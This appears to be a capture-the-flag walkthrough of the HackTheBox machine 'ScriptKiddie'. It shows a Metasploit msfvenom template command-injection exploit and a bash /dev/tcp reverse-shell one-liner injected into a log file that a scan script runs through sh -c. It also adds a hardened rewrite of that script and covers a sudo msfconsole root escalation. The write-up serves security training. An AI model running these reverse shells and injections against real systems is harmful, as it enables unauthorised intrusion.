ScriptKiddie is one of the machines currently available on the HackTheBox hacking platform, with difficulty xxxxx.
In this case it is a machine based on the xxxxx operating system.
Port scanning
As usual, we add the ScriptKiddie machine's IP, 10.10.10.226, to /etc/hosts as scriptkiddie.htb and start with an nmap port scan.
```text
# Nmap 7.70 scan initiated Thu Feb 11 13:54:29 2021 as: nmap -sV -sC -p- -oA enumeration/nmap 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 11 13:55:15 2021 -- 1 IP address (1 host up) scanned in 46.01 seconds
```
We see nothing relevant other than a web portal on port 5000, so we go for it.
Enumeration
We access port 5000 through the browser and find the following web page:
We see a web portal with different tools for running scans, generating payloads, and so on.
We try the payload generation and, whatever we do, it always returns a link to an .exe file that is used as a template:
So we search Google and find a Metasploit exploit for generating templates that carry a reverse shell:
So we go to Metasploit to generate our template file:
```text
msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


**DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.11
lhost => 10.10.14.11
msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >
msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /root/.msf4/local/msf.apk
```
And we upload it in the payloads section, obtaining a shell on the machine as the user kid on our listener:
```text
$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.226] 42008
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
whoami
kid
```
Getting the user flag
Now that we have a shell, we go to this user's home directory and find the user flag:
```text
cd ..
ls -l
total 456
drwxrwxr-x 5 kid kid   4096 Feb  3 11:03 html
-rw-r--r-- 1 kid kid 120525 Feb 11 12:21 linpeas.log
-rwxr-xr-x 1 kid kid 325084 Feb 11 12:11 linpeas.sh
drwxrwxrwx 2 kid kid   4096 Feb  3 07:40 logs
drwxr-xr-x 3 kid kid   4096 Feb  3 11:48 snap
-r-------- 1 kid kid     33 Feb 10 21:18 user.txt
cat user.txt
cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9
```
Privilege escalation
Next, for convenience, we upgrade to an interactive shell using python:
```text
python3 -c 'import pty;pty.spawn("/bin/bash")'
kid@scriptkiddie:~$
```
We check the existing users and see that we have access to the home directory of the user pwn:
```text
kid@scriptkiddie:/home$ cd pwn
cd pwn
kid@scriptkiddie:/home/pwn$ ll
ll
total 44
drwxr-xr-x 6 pwn  pwn  4096 Feb  3 12:06 ./
drwxr-xr-x 4 root root 4096 Feb  3 07:40 ../
lrwxrwxrwx 1 root root    9 Feb  3 12:06 .bash_history -> /dev/null
-rw-r--r-- 1 pwn  pwn   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pwn  pwn  3771 Feb 25  2020 .bashrc
drwx------ 2 pwn  pwn  4096 Jan 28 17:08 .cache/
drwxrwxr-x 3 pwn  pwn  4096 Jan 28 17:24 .local/
-rw-r--r-- 1 pwn  pwn   807 Feb 25  2020 .profile
-rw-rw-r-- 1 pwn  pwn    74 Jan 28 16:22 .selected_editor
drwx------ 2 pwn  pwn  4096 Feb 10 16:10 .ssh/
drwxrw---- 2 pwn  pwn  4096 Feb 11 11:50 recon/
-rwxrwxr-- 1 pwn  pwn   250 Jan 28 17:57 scanlosers.sh*
kid@scriptkiddie:/home/pwn$
```
And an interesting script in this directory called scanlosers.sh, with the following contents:
```bash
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/

cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
Reviewing it, we will try to escalate privileges through this script, so we run the following command against the hackers file that the script above operates on:
```bash
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers
```
So we run it as the user kid:
```text
kid@scriptkiddie:~/logs$ echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers
<-i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers
kid@scriptkiddie:~/logs$
```
And we get a shell as the user pwn on our netcat listener:
```text
$ nc -lvp 4445
listening on [any] 4445 ...
connect to [10.10.14.11] from scriptkiddie.htb [10.10.10.226] 51950
bash: cannot set terminal process group (863): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$
```
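The injection works because scanlosers.sh splices log content, written by another user, into an `sh -c` string. Below is a hardened rewrite, added here as an example (it is not the script from the machine): every candidate target must be a well-formed dotted-quad IPv4 address, and the address is passed to nmap as its own argument instead of through `sh -c`. The `LOG_FILE` and `RECON_DIR` environment overrides are assumptions added so the functions can be exercised against a constructed log.

```shell
#!/bin/sh
# Hardened rewrite of scanlosers.sh (added example, not the script from the machine).
# Fix 1: every candidate target must be a well-formed dotted-quad IPv4 address.
# Fix 2: the target is a separate nmap argument; no command string is ever built from log content.
# LOG_FILE and RECON_DIR are assumed overrides so the functions can run against a test log.

log=${LOG_FILE:-/home/kid/logs/hackers}
outdir=${RECON_DIR:-/home/pwn/recon}

# Return 0 only for four dot-separated groups of 1-3 digits, each in the range 0-255.
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print the unique, validated targets found in a log file, one per line.
# Malformed entries (such as a shell payload appended to the log) go to stderr and are skipped.
extract_targets() {
    cut -d' ' -f3- "$1" | sort -u | while read -r ip; do
        if valid_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'scanlosers: skipping malformed target: %s\n' "$ip" >&2
        fi
    done
}

scan_targets() {
    extract_targets "$log" | while read -r ip; do
        # The address is its own argv entry: no sh -c, nothing from the log reaches a shell parser.
        nmap --top-ports 10 -oN "$outdir/$ip.nmap" "$ip" >/dev/null 2>&1 &
    done
    # Truncate the log only after it has been consumed, as the original script does.
    if [ -s "$log" ]; then : > "$log"; fi
}

# Only start scanning when invoked with --run, so sourcing the file has no side effects.
if [ "${1:-}" = --run ]; then scan_targets; fi
```

Validation narrows what reaches nmap, but the file is still written by a different user, so a reviewer would also question whether a cron job for pwn should consume kid's world-writable log directory at all.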
So next we check what permissions this user has:
```text
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$
```
And we see that it is allowed to run msfconsole as root, so we go for it:
```text
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole
[... msfconsole ASCII-art banner ("Session one died of dysentery") omitted ...]
Press ENTER to size up the situation
Press SPACE BAR to continue


       =[ metasploit v6.0.9-dev                          ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 >
```
And we verify the current user, which is root:
```text
msf6 > id
stty: 'standard input': Inappropriate ioctl for device
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 >
```
Getting the root flag
So now that we have root access, we simply read the flag from this Metasploit console:
```text
msf6 > cat /root/root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat /root/root.txt

9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 >
```
And we now have our root flag to complete this machine and earn our points.
If you are a HackTheBox user and you liked my writeup, please give me respect at the following link